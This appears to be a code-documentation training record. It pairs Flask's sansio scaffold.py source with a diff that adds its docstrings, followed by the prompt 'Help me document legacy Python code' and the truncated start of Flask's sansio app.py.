"T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable
)
T_route = t.TypeVar("T_route", bound=ft.RouteCallable)
def setupmethod(f: F) -> F:
f_name = f.__name__
def wrapper_func(self: Scaffold, *args: t.Any, **kwargs: t.Any) -> t.Any:
self._check_setup_finished(f_name)
return f(self, *args, **kwargs)
return t.cast(F, update_wrapper(wrapper_func, f))
class Scaffold:
cli: Group
name: str
_static_folder: str | None = None
_static_url_path: str | None = None
def __init__(
self,
import_name: str,
static_folder: str | os.PathLike[str] | None = None,
static_url_path: str | None = None,
template_folder: str | os.PathLike[str] | None = None,
root_path: str | None = None,
):
#: The name of the package or module that this object belongs
#: to. Do not change this once it is set by the constructor.
self.import_name = import_name
self.static_folder = static_folder
self.static_url_path = static_url_path
#: The path to the templates folder, relative to
#: :attr:`root_path`, to add to the template loader. ``None`` if
#: templates should not be added.
self.template_folder = template_folder
if root_path is None:
root_path = get_root_path(self.import_name)
#: Absolute path to the package on the filesystem. Used to look
#: up resources contained in the package.
self.root_path = root_path
#: A dictionary mapping endpoint names to view functions.
#:
#: To register a view function, use the :meth:`route` decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.view_functions: dict[str, ft.RouteCallable] = {}
#: A data structure of registered error handlers, in the format
#: ``{scope: {code: {class: handler}}}``. The ``scope`` key is
#: the name of a blueprint the handlers are active for, or
#: ``None`` for all requests. The ``code`` key is the HTTP
#: status code for ``HTTPException``, or ``None`` for
#: other exceptions. The innermost dictionary maps exception
#: classes to handler functions.
#:
#: To register an error handler, use the :meth:`errorhandler`
#: decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.error_handler_spec: dict[
ft.AppOrBlueprintKey,
dict[int | None, dict[type[Exception], ft.ErrorHandlerCallable]],
] = defaultdict(lambda: defaultdict(dict))
#: A data structure of functions to call at the beginning of
#: each request, in the format ``{scope: [functions]}``. The
#: ``scope`` key is the name of a blueprint the functions are
#: active for, or ``None`` for all requests.
#:
#: To register a function, use the :meth:`before_request`
#: decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.before_request_funcs: dict[
ft.AppOrBlueprintKey, list[ft.BeforeRequestCallable]
] = defaultdict(list)
#: A data structure of functions to call at the end of each
#: request, in the format ``{scope: [functions]}``. The
#: ``scope`` key is the name of a blueprint the functions are
#: active for, or ``None`` for all requests.
#:
#: To register a function, use the :meth:`after_request`
#: decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.after_request_funcs: dict[
ft.AppOrBlueprintKey, list[ft.AfterRequestCallable[t.Any]]
] = defaultdict(list)
#: A data structure of functions to call at the end of each
#: request even if an exception is raised, in the format
#: ``{scope: [functions]}``. The ``scope`` key is the name of a
#: blueprint the functions are active for, or ``None`` for all
#: requests.
#:
#: To register a function, use the :meth:`teardown_request`
#: decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.teardown_request_funcs: dict[
ft.AppOrBlueprintKey, list[ft.TeardownCallable]
] = defaultdict(list)
#: A data structure of functions to call to pass extra context
#: values when rendering templates, in the format
#: ``{scope: [functions]}``. The ``scope`` key is the name of a
#: blueprint the functions are active for, or ``None`` for all
#: requests.
#:
#: To register a function, use the :meth:`context_processor`
#: decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.template_context_processors: dict[
ft.AppOrBlueprintKey, list[ft.TemplateContextProcessorCallable]
] = defaultdict(list, {None: [_default_template_ctx_processor]})
#: A data structure of functions to call to modify the keyword
#: arguments passed to the view function, in the format
#: ``{scope: [functions]}``. The ``scope`` key is the name of a
#: blueprint the functions are active for, or ``None`` for all
#: requests.
#:
#: To register a function, use the
#: :meth:`url_value_preprocessor` decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.url_value_preprocessors: dict[
ft.AppOrBlueprintKey,
list[ft.URLValuePreprocessorCallable],
] = defaultdict(list)
#: A data structure of functions to call to modify the keyword
#: arguments when generating URLs, in the format
#: ``{scope: [functions]}``. The ``scope`` key is the name of a
#: blueprint the functions are active for, or ``None`` for all
#: requests.
#:
#: To register a function, use the :meth:`url_defaults`
#: decorator.
#:
#: This data structure is internal. It should not be modified
#: directly and its format may change at any time.
self.url_default_functions: dict[
ft.AppOrBlueprintKey, list[ft.URLDefaultCallable]
] = defaultdict(list)
def __repr__(self) -> str:
return f"<{type(self).__name__} {self.name!r}>"
def _check_setup_finished(self, f_name: str) -> None:
raise NotImplementedError
@property
def static_folder(self) -> str | None:
if self._static_folder is not None:
return os.path.join(self.root_path, self._static_folder)
else:
return None
@static_folder.setter
def static_folder(self, value: str | os.PathLike[str] | None) -> None:
if value is not None:
value = os.fspath(value).rstrip(r"\/")
self._static_folder = value
@property
def has_static_folder(self) -> bool:
return self.static_folder is not None
@property
def static_url_path(self) -> str | None:
if self._static_url_path is not None:
return self._static_url_path
if self.static_folder is not None:
basename = os.path.basename(self.static_folder)
return f"/{basename}".rstrip("/")
return None
@static_url_path.setter
def static_url_path(self, value: str | None) -> None:
if value is not None:
value = value.rstrip("/")
self._static_url_path = value
@cached_property
def jinja_loader(self) -> BaseLoader | None:
if self.template_folder is not None:
return FileSystemLoader(os.path.join(self.root_path, self.template_folder))
else:
return None
def _method_route(
self,
method: str,
rule: str,
options: dict[str, t.Any],
) -> t.Callable[[T_route], T_route]:
if "methods" in options:
raise TypeError("Use the 'route' decorator to use the 'methods' argument.")
return self.route(rule, methods=[method], **options)
@setupmethod
def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
return self._method_route("GET", rule, options)
@setupmethod
def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
return self._method_route("POST", rule, options)
@setupmethod
def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
return self._method_route("PUT", rule, options)
@setupmethod
def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
return self._method_route("DELETE", rule, options)
@setupmethod
def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
return self._method_route("PATCH", rule, options)
@setupmethod
def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
def decorator(f: T_route) -> T_route:
endpoint = options.pop("endpoint", None)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
@setupmethod
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
raise NotImplementedError
@setupmethod
def endpoint(self, endpoint: str) -> t.Callable[[F], F]:
def decorator(f: F) -> F:
self.view_functions[endpoint] = f
return f
return decorator
@setupmethod
def before_request(self, f: T_before_request) -> T_before_request:
self.before_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def after_request(self, f: T_after_request) -> T_after_request:
self.after_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def teardown_request(self, f: T_teardown) -> T_teardown:
self.teardown_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def context_processor(
self,
f: T_template_context_processor,
) -> T_template_context_processor:
self.template_context_processors[None].append(f)
return f
@setupmethod
def url_value_preprocessor(
self,
f: T_url_value_preprocessor,
) -> T_url_value_preprocessor:
self.url_value_preprocessors[None].append(f)
return f
@setupmethod
def url_defaults(self, f: T_url_defaults) -> T_url_defaults:
self.url_default_functions[None].append(f)
return f
@setupmethod
def errorhandler(
self, code_or_exception: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
def decorator(f: T_error_handler) -> T_error_handler:
self.register_error_handler(code_or_exception, f)
return f
return decorator
@setupmethod
def register_error_handler(
self,
code_or_exception: type[Exception] | int,
f: ft.ErrorHandlerCallable,
) -> None:
exc_class, code = self._get_exc_class_and_code(code_or_exception)
self.error_handler_spec[None][code][exc_class] = f
@staticmethod
def _get_exc_class_and_code(
exc_class_or_code: type[Exception] | int,
) -> tuple[type[Exception], int | None]:
exc_class: type[Exception]
if isinstance(exc_class_or_code, int):
try:
exc_class = default_exceptions[exc_class_or_code]
except KeyError:
raise ValueError(
f"'{exc_class_or_code}' is not a recognized HTTP"
" error code. Use a subclass of HTTPException with"
" that code instead."
) from None
else:
exc_class = exc_class_or_code
if isinstance(exc_class, Exception):
raise TypeError(
f"{exc_class!r} is an instance, not a class. Handlers"
" can only be registered for Exception classes or HTTP"
" error codes."
)
if not issubclass(exc_class, Exception):
raise ValueError(
f"'{exc_class.__name__}' is not a subclass of Exception."
" Handlers can only be registered for Exception classes"
" or HTTP error codes."
)
if issubclass(exc_class, HTTPException):
return exc_class, exc_class.code
else:
return exc_class, None
def _endpoint_from_view_func(view_func: ft.RouteCallable) -> str:
assert view_func is not None, "expected view func if endpoint is not provided."
return view_func.__name__
def _find_package_path(import_name: str) -> str:
root_mod_name, _, _ = import_name.partition(".")
try:
root_spec = importlib.util.find_spec(root_mod_name)
if root_spec is None:
raise ValueError("not found")
except (ImportError, ValueError):
# ImportError: the machinery told us it does not exist
# ValueError:
# - the module name was invalid
# - the module name is __main__
# - we raised `ValueError` due to `root_spec` being `None`
return os.getcwd()
if root_spec.submodule_search_locations:
if root_spec.origin is None or root_spec.origin == "namespace":
# namespace package
package_spec = importlib.util.find_spec(import_name)
if package_spec is not None and package_spec.submodule_search_locations:
# Pick the path in the namespace that contains the submodule.
package_path = pathlib.Path(
os.path.commonpath(package_spec.submodule_search_locations)
)
search_location = next(
location
for location in root_spec.submodule_search_locations
if package_path.is_relative_to(location)
)
else:
# Pick the first path.
search_location = root_spec.submodule_search_locations[0]
return os.path.dirname(search_location)
else:
# package with __init__.py
return os.path.dirname(os.path.dirname(root_spec.origin))
else:
# module
return os.path.dirname(root_spec.origin) # type: ignore[type-var, return-value]
def find_package(import_name: str) -> tuple[str | None, str]:
package_path = _find_package_path(import_name)
py_prefix = os.path.abspath(sys.prefix)
# installed to the system
if pathlib.PurePath(package_path).is_relative_to(py_prefix):
return py_prefix, package_path
site_parent, site_folder = os.path.split(package_path)
# installed to a virtualenv
if site_folder.lower() == "site-packages":
parent, folder = os.path.split(site_parent)
# Windows (prefix/lib/site-packages)
if folder.lower() == "lib":
return parent, package_path
# Unix (prefix/lib/pythonX.Y/site-packages)
if os.path.basename(parent).lower() == "lib":
return os.path.dirname(parent), package_path
# something else (prefix/site-packages)
return site_parent, package_path
# not installed
return None, package_path | --- +++ @@ -50,6 +50,22 @@
class Scaffold:
+ """Common behavior shared between :class:`~flask.Flask` and
+ :class:`~flask.blueprints.Blueprint`.
+
+ :param import_name: The import name of the module where this object
+ is defined. Usually :attr:`__name__` should be used.
+ :param static_folder: Path to a folder of static files to serve.
+ If this is set, a static route will be added.
+ :param static_url_path: URL prefix for the static route.
+ :param template_folder: Path to a folder containing template files.
+ for rendering. If this is set, a Jinja loader will be added.
+ :param root_path: The path that static, template, and resource files
+ are relative to. Typically not set, it is discovered based on
+ the ``import_name``.
+
+ .. versionadded:: 2.0
+ """
cli: Group
name: str
@@ -206,6 +222,9 @@
@property
def static_folder(self) -> str | None:
+ """The absolute path to the configured static folder. ``None``
+ if no static folder is set.
+ """
if self._static_folder is not None:
return os.path.join(self.root_path, self._static_folder)
else:
@@ -220,10 +239,19 @@
@property
def has_static_folder(self) -> bool:
+ """``True`` if :attr:`static_folder` is set.
+
+ .. versionadded:: 0.5
+ """
return self.static_folder is not None
@property
def static_url_path(self) -> str | None:
+ """The URL prefix that the static route will be accessible from.
+
+ If it was not configured during init, it is derived from
+ :attr:`static_folder`.
+ """
if self._static_url_path is not None:
return self._static_url_path
@@ -242,6 +270,12 @@
@cached_property
def jinja_loader(self) -> BaseLoader | None:
+ """The Jinja loader for this object's templates. By default this
+ is a class :class:`jinja2.loaders.FileSystemLoader` to
+ :attr:`template_folder` if it is set.
+
+ .. versionadded:: 0.5
+ """
if self.template_folder is not None:
return FileSystemLoader(os.path.join(self.root_path, self.template_folder))
else:
@@ -260,26 +294,68 @@
@setupmethod
def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["GET"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("GET", rule, options)
@setupmethod
def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["POST"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("POST", rule, options)
@setupmethod
def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["PUT"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("PUT", rule, options)
@setupmethod
def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["DELETE"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("DELETE", rule, options)
@setupmethod
def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Shortcut for :meth:`route` with ``methods=["PATCH"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("PATCH", rule, options)
@setupmethod
def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Decorate a view function to register it with the given URL
+ rule and options. Calls :meth:`add_url_rule`, which has more
+ details about the implementation.
+
+ .. code-block:: python
+
+ @app.route("/")
+ def index():
+ return "Hello, World!"
+
+ See :ref:`url-route-registrations`.
+
+ The endpoint name for the route defaults to the name of the view
+ function if the ``endpoint`` parameter isn't passed.
+
+ The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` and
+ ``OPTIONS`` are added automatically.
+
+ :param rule: The URL rule string.
+ :param options: Extra options passed to the
+ :class:`~werkzeug.routing.Rule` object.
+ """
def decorator(f: T_route) -> T_route:
endpoint = options.pop("endpoint", None)
@@ -297,10 +373,82 @@ provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
+ """Register a rule for routing incoming requests and building
+ URLs. The :meth:`route` decorator is a shortcut to call this
+ with the ``view_func`` argument. These are equivalent:
+
+ .. code-block:: python
+
+ @app.route("/")
+ def index():
+ ...
+
+ .. code-block:: python
+
+ def index():
+ ...
+
+ app.add_url_rule("/", view_func=index)
+
+ See :ref:`url-route-registrations`.
+
+ The endpoint name for the route defaults to the name of the view
+ function if the ``endpoint`` parameter isn't passed. An error
+ will be raised if a function has already been registered for the
+ endpoint.
+
+ The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` is
+ always added automatically, and ``OPTIONS`` is added
+ automatically by default.
+
+ ``view_func`` does not necessarily need to be passed, but if the
+ rule should participate in routing an endpoint name must be
+ associated with a view function at some point with the
+ :meth:`endpoint` decorator.
+
+ .. code-block:: python
+
+ app.add_url_rule("/", endpoint="index")
+
+ @app.endpoint("index")
+ def index():
+ ...
+
+ If ``view_func`` has a ``required_methods`` attribute, those
+ methods are added to the passed and automatic methods. If it
+ has a ``provide_automatic_methods`` attribute, it is used as the
+ default if the parameter is not passed.
+
+ :param rule: The URL rule string.
+ :param endpoint: The endpoint name to associate with the rule
+ and view function. Used when routing and building URLs.
+ Defaults to ``view_func.__name__``.
+ :param view_func: The view function to associate with the
+ endpoint name.
+ :param provide_automatic_options: Add the ``OPTIONS`` method and
+ respond to ``OPTIONS`` requests automatically.
+ :param options: Extra options passed to the
+ :class:`~werkzeug.routing.Rule` object.
+ """
raise NotImplementedError
@setupmethod
def endpoint(self, endpoint: str) -> t.Callable[[F], F]:
+ """Decorate a view function to register it for the given
+ endpoint. Used if a rule is added without a ``view_func`` with
+ :meth:`add_url_rule`.
+
+ .. code-block:: python
+
+ app.add_url_rule("/ex", endpoint="example")
+
+ @app.endpoint("example")
+ def example():
+ ...
+
+ :param endpoint: The endpoint name to associate with the view
+ function.
+ """
def decorator(f: F) -> F:
self.view_functions[endpoint] = f
@@ -310,16 +458,83 @@
@setupmethod
def before_request(self, f: T_before_request) -> T_before_request:
+ """Register a function to run before each request.
+
+ For example, this can be used to open a database connection, or
+ to load the logged in user from the session.
+
+ .. code-block:: python
+
+ @app.before_request
+ def load_user():
+ if "user_id" in session:
+ g.user = db.session.get(session["user_id"])
+
+ The function will be called without any arguments. If it returns
+ a non-``None`` value, the value is handled as if it was the
+ return value from the view, and further request handling is
+ stopped.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ executes before every request. When used on a blueprint, this executes before
+ every request that the blueprint handles. To register with a blueprint and
+ execute before every request, use :meth:`.Blueprint.before_app_request`.
+ """
self.before_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def after_request(self, f: T_after_request) -> T_after_request:
+ """Register a function to run after each request to this object.
+
+ The function is called with the response object, and must return
+ a response object. This allows the functions to modify or
+ replace the response before it is sent.
+
+ If a function raises an exception, any remaining
+ ``after_request`` functions will not be called. Therefore, this
+ should not be used for actions that must execute, such as to
+ close resources. Use :meth:`teardown_request` for that.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ executes after every request. When used on a blueprint, this executes after
+ every request that the blueprint handles. To register with a blueprint and
+ execute after every request, use :meth:`.Blueprint.after_app_request`.
+ """
self.after_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def teardown_request(self, f: T_teardown) -> T_teardown:
+ """Register a function to be called when the request context is
+ popped. Typically, this happens at the end of each request, but
+ contexts may be pushed manually during testing.
+
+ .. code-block:: python
+
+ with app.test_request_context():
+ ...
+
+ When the ``with`` block exits (or ``ctx.pop()`` is called), the
+ teardown functions are called just before the request context is
+ made inactive.
+
+ When a teardown function was called because of an unhandled
+ exception it will be passed an error object. If an
+ :meth:`errorhandler` is registered, it will handle the exception
+ and the teardown will not receive it.
+
+ Teardown functions must avoid raising exceptions. If they
+ execute code that might fail they must surround that code with a
+ ``try``/``except`` block and log any errors.
+
+ The return values of teardown functions are ignored.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ executes after every request. When used on a blueprint, this executes after
+ every request that the blueprint handles. To register with a blueprint and
+ execute after every request, use :meth:`.Blueprint.teardown_app_request`.
+ """
self.teardown_request_funcs.setdefault(None, []).append(f)
return f
@@ -328,6 +543,15 @@ self,
f: T_template_context_processor,
) -> T_template_context_processor:
+ """Registers a template context processor function. These functions run before
+ rendering a template. The keys of the returned dict are added as variables
+ available in the template.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ is called for every rendered template. When used on a blueprint, this is called
+ for templates rendered from the blueprint's views. To register with a blueprint
+ and affect every template, use :meth:`.Blueprint.app_context_processor`.
+ """
self.template_context_processors[None].append(f)
return f
@@ -336,11 +560,37 @@ self,
f: T_url_value_preprocessor,
) -> T_url_value_preprocessor:
+ """Register a URL value preprocessor function for all view
+ functions in the application. These functions will be called before the
+ :meth:`before_request` functions.
+
+ The function can modify the values captured from the matched url before
+ they are passed to the view. For example, this can be used to pop a
+ common language code value and place it in ``g`` rather than pass it to
+ every view.
+
+ The function is passed the endpoint name and values dict. The return
+ value is ignored.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ is called for every request. When used on a blueprint, this is called for
+ requests that the blueprint handles. To register with a blueprint and affect
+ every request, use :meth:`.Blueprint.app_url_value_preprocessor`.
+ """
self.url_value_preprocessors[None].append(f)
return f
@setupmethod
def url_defaults(self, f: T_url_defaults) -> T_url_defaults:
+ """Callback function for URL defaults for all view functions of the
+ application. It's called with the endpoint and values and should
+ update the values passed in place.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ is called for every request. When used on a blueprint, this is called for
+ requests that the blueprint handles. To register with a blueprint and affect
+ every request, use :meth:`.Blueprint.app_url_defaults`.
+ """
self.url_default_functions[None].append(f)
return f
@@ -348,6 +598,39 @@ def errorhandler(
self, code_or_exception: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
+ """Register a function to handle errors by code or exception class.
+
+ A decorator that is used to register a function given an
+ error code. Example::
+
+ @app.errorhandler(404)
+ def page_not_found(error):
+ return 'This page does not exist', 404
+
+ You can also register handlers for arbitrary exceptions::
+
+ @app.errorhandler(DatabaseError)
+ def special_exception_handler(error):
+ return 'Database connection failed', 500
+
+ This is available on both app and blueprint objects. When used on an app, this
+ can handle errors from every request. When used on a blueprint, this can handle
+ errors from requests that the blueprint handles. To register with a blueprint
+ and affect every request, use :meth:`.Blueprint.app_errorhandler`.
+
+ .. versionadded:: 0.7
+ Use :meth:`register_error_handler` instead of modifying
+ :attr:`error_handler_spec` directly, for application wide error
+ handlers.
+
+ .. versionadded:: 0.7
+ One can now additionally also register custom exception types
+ that do not necessarily have to be a subclass of the
+ :class:`~werkzeug.exceptions.HTTPException` class.
+
+ :param code_or_exception: the code as integer for the handler, or
+ an arbitrary exception
+ """
def decorator(f: T_error_handler) -> T_error_handler:
self.register_error_handler(code_or_exception, f)
@@ -361,6 +644,12 @@ code_or_exception: type[Exception] | int,
f: ft.ErrorHandlerCallable,
) -> None:
+ """Alternative error attach function to the :meth:`errorhandler`
+ decorator that is more straightforward to use for non decorator
+ usage.
+
+ .. versionadded:: 0.7
+ """
exc_class, code = self._get_exc_class_and_code(code_or_exception)
self.error_handler_spec[None][code][exc_class] = f
@@ -368,6 +657,13 @@ def _get_exc_class_and_code(
exc_class_or_code: type[Exception] | int,
) -> tuple[type[Exception], int | None]:
+ """Get the exception class being handled. For HTTP status codes
+ or ``HTTPException`` subclasses, return both the exception and
+ status code.
+
+ :param exc_class_or_code: Any exception class, or an HTTP status
+ code as an integer.
+ """
exc_class: type[Exception]
if isinstance(exc_class_or_code, int):
@@ -403,11 +699,15 @@
def _endpoint_from_view_func(view_func: ft.RouteCallable) -> str:
+ """Internal helper that returns the default endpoint for a given
+ function. This always is the function name.
+ """
assert view_func is not None, "expected view func if endpoint is not provided."
return view_func.__name__
def _find_package_path(import_name: str) -> str:
+ """Find the path that contains the package or module."""
root_mod_name, _, _ = import_name.partition(".")
try:
@@ -452,6 +752,18 @@
def find_package(import_name: str) -> tuple[str | None, str]:
+ """Find the prefix that a package is installed under, and the path
+ that it would be imported from.
+
+ The prefix is the directory containing the standard directory
+ hierarchy (lib, bin, etc.). If the package is not installed to the
+ system (:attr:`sys.prefix`) or a virtualenv (``site-packages``),
+ ``None`` is returned.
+
+ The path is the entry in :attr:`sys.path` that contains the package
+ for import. If the package is not installed, it's assumed that the
+ package was imported from the current working directory.
+ """
package_path = _find_package_path(import_name)
py_prefix = os.path.abspath(sys.prefix)
@@ -477,4 +789,4 @@ return site_parent, package_path
# not installed
- return None, package_path+ return None, package_path
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sansio/scaffold.py |
Help me document legacy Python code | from __future__ import annotations
import logging
import os
import sys
import typing as t
from datetime import timedelta
from itertools import chain
from werkzeug.exceptions import Aborter
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import BadRequestKeyError
from werkzeug.routing import BuildError
from werkzeug.routing import Map
from werkzeug.routing import Rule
from werkzeug.sansio.response import Response
from werkzeug.utils import cached_property
from werkzeug.utils import redirect as _wz_redirect
from .. import typing as ft
from ..config import Config
from ..config import ConfigAttribute
from ..ctx import _AppCtxGlobals
from ..helpers import _split_blueprint_path
from ..helpers import get_debug_flag
from ..json.provider import DefaultJSONProvider
from ..json.provider import JSONProvider
from ..logging import create_logger
from ..templating import DispatchingJinjaLoader
from ..templating import Environment
from .scaffold import _endpoint_from_view_func
from .scaffold import find_package
from .scaffold import Scaffold
from .scaffold import setupmethod
if t.TYPE_CHECKING: # pragma: no cover
from werkzeug.wrappers import Response as BaseResponse
from ..testing import FlaskClient
from ..testing import FlaskCliRunner
from .blueprints import Blueprint
T_shell_context_processor = t.TypeVar(
"T_shell_context_processor", bound=ft.ShellContextProcessorCallable
)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable)
T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable)
T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable)
def _make_timedelta(value: timedelta | int | None) -> timedelta | None:
if value is None or isinstance(value, timedelta):
return value
return timedelta(seconds=value)
class App(Scaffold):
#: The class of the object assigned to :attr:`aborter`, created by
#: :meth:`create_aborter`. That object is called by
#: :func:`flask.abort` to raise HTTP errors, and can be
#: called directly as well.
#:
#: Defaults to :class:`werkzeug.exceptions.Aborter`.
#:
#: .. versionadded:: 2.2
aborter_class = Aborter
#: The class that is used for the Jinja environment.
#:
#: .. versionadded:: 0.11
jinja_environment = Environment
#: The class that is used for the :data:`~flask.g` instance.
#:
#: Example use cases for a custom class:
#:
#: 1. Store arbitrary attributes on flask.g.
#: 2. Add a property for lazy per-request database connectors.
#: 3. Return None instead of AttributeError on unexpected attributes.
#: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g.
#:
#: .. versionadded:: 0.10
#: Renamed from ``request_globals_class`.
app_ctx_globals_class = _AppCtxGlobals
#: The class that is used for the ``config`` attribute of this app.
#: Defaults to :class:`~flask.Config`.
#:
#: Example use cases for a custom class:
#:
#: 1. Default values for certain config options.
#: 2. Access to config values through attributes in addition to keys.
#:
#: .. versionadded:: 0.11
config_class = Config
#: The testing flag. Set this to ``True`` to enable the test mode of
#: Flask extensions (and in the future probably also Flask itself).
#: For example this might activate test helpers that have an
#: additional runtime cost which should not be enabled by default.
#:
#: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the
#: default it's implicitly enabled.
#:
#: This attribute can also be configured from the config with the
#: ``TESTING`` configuration key. Defaults to ``False``.
testing = ConfigAttribute[bool]("TESTING")
#: If a secret key is set, cryptographic components can use this to
#: sign cookies and other things. Set this to a complex random value
#: when you want to use the secure cookie for instance.
#:
#: This attribute can also be configured from the config with the
#: :data:`SECRET_KEY` configuration key. Defaults to ``None``.
secret_key = ConfigAttribute[str | bytes | None]("SECRET_KEY")
#: A :class:`~datetime.timedelta` which is used to set the expiration
#: date of a permanent session. The default is 31 days which makes a
#: permanent session survive for roughly one month.
#:
#: This attribute can also be configured from the config with the
#: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to
#: ``timedelta(days=31)``
permanent_session_lifetime = ConfigAttribute[timedelta](
"PERMANENT_SESSION_LIFETIME",
get_converter=_make_timedelta, # type: ignore[arg-type]
)
json_provider_class: type[JSONProvider] = DefaultJSONProvider
"""A subclass of :class:`~flask.json.provider.JSONProvider`. An
instance is created and assigned to :attr:`app.json` when creating
the app.
The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses
Python's built-in :mod:`json` library. A different provider can use
a different JSON library.
.. versionadded:: 2.2
"""
#: Options that are passed to the Jinja environment in
#: :meth:`create_jinja_environment`. Changing these options after
#: the environment is created (accessing :attr:`jinja_env`) will
#: have no effect.
#:
#: .. versionchanged:: 1.1.0
#: This is a ``dict`` instead of an ``ImmutableDict`` to allow
#: easier configuration.
#:
jinja_options: dict[str, t.Any] = {}
#: The rule object to use for URL rules created. This is used by
#: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`.
#:
#: .. versionadded:: 0.7
url_rule_class = Rule
#: The map object to use for storing the URL rules and routing
#: configuration parameters. Defaults to :class:`werkzeug.routing.Map`.
#:
#: .. versionadded:: 1.1.0
url_map_class = Map
#: The :meth:`test_client` method creates an instance of this test
#: client class. Defaults to :class:`~flask.testing.FlaskClient`.
#:
#: .. versionadded:: 0.7
test_client_class: type[FlaskClient] | None = None
#: The :class:`~click.testing.CliRunner` subclass, by default
#: :class:`~flask.testing.FlaskCliRunner` that is used by
#: :meth:`test_cli_runner`. Its ``__init__`` method should take a
#: Flask app object as the first argument.
#:
#: .. versionadded:: 1.0
test_cli_runner_class: type[FlaskCliRunner] | None = None
default_config: dict[str, t.Any]
response_class: type[Response]
def __init__(
self,
import_name: str,
static_url_path: str | None = None,
static_folder: str | os.PathLike[str] | None = "static",
static_host: str | None = None,
host_matching: bool = False,
subdomain_matching: bool = False,
template_folder: str | os.PathLike[str] | None = "templates",
instance_path: str | None = None,
instance_relative_config: bool = False,
root_path: str | None = None,
) -> None:
super().__init__(
import_name=import_name,
static_folder=static_folder,
static_url_path=static_url_path,
template_folder=template_folder,
root_path=root_path,
)
if instance_path is None:
instance_path = self.auto_find_instance_path()
elif not os.path.isabs(instance_path):
raise ValueError(
"If an instance path is provided it must be absolute."
" A relative path was given instead."
)
#: Holds the path to the instance folder.
#:
#: .. versionadded:: 0.8
self.instance_path = instance_path
#: The configuration dictionary as :class:`Config`. This behaves
#: exactly like a regular dictionary but supports additional methods
#: to load a config from files.
self.config = self.make_config(instance_relative_config)
#: An instance of :attr:`aborter_class` created by
#: :meth:`make_aborter`. This is called by :func:`flask.abort`
#: to raise HTTP errors, and can be called directly as well.
#:
#: .. versionadded:: 2.2
#: Moved from ``flask.abort``, which calls this object.
self.aborter = self.make_aborter()
self.json: JSONProvider = self.json_provider_class(self)
"""Provides access to JSON methods. Functions in ``flask.json``
will call methods on this provider when the application context
is active. Used for handling JSON requests and responses.
An instance of :attr:`json_provider_class`. Can be customized by
changing that attribute on a subclass, or by assigning to this
attribute afterwards.
The default, :class:`~flask.json.provider.DefaultJSONProvider`,
uses Python's built-in :mod:`json` library. A different provider
can use a different JSON library.
.. versionadded:: 2.2
"""
#: A list of functions that are called by
#: :meth:`handle_url_build_error` when :meth:`.url_for` raises a
#: :exc:`~werkzeug.routing.BuildError`. Each function is called
#: with ``error``, ``endpoint`` and ``values``. If a function
#: returns ``None`` or raises a ``BuildError``, it is skipped.
#: Otherwise, its return value is returned by ``url_for``.
#:
#: .. versionadded:: 0.9
self.url_build_error_handlers: list[
t.Callable[[Exception, str, dict[str, t.Any]], str]
] = []
#: A list of functions that are called when the application context
#: is destroyed. Since the application context is also torn down
#: if the request ends this is the place to store code that disconnects
#: from databases.
#:
#: .. versionadded:: 0.9
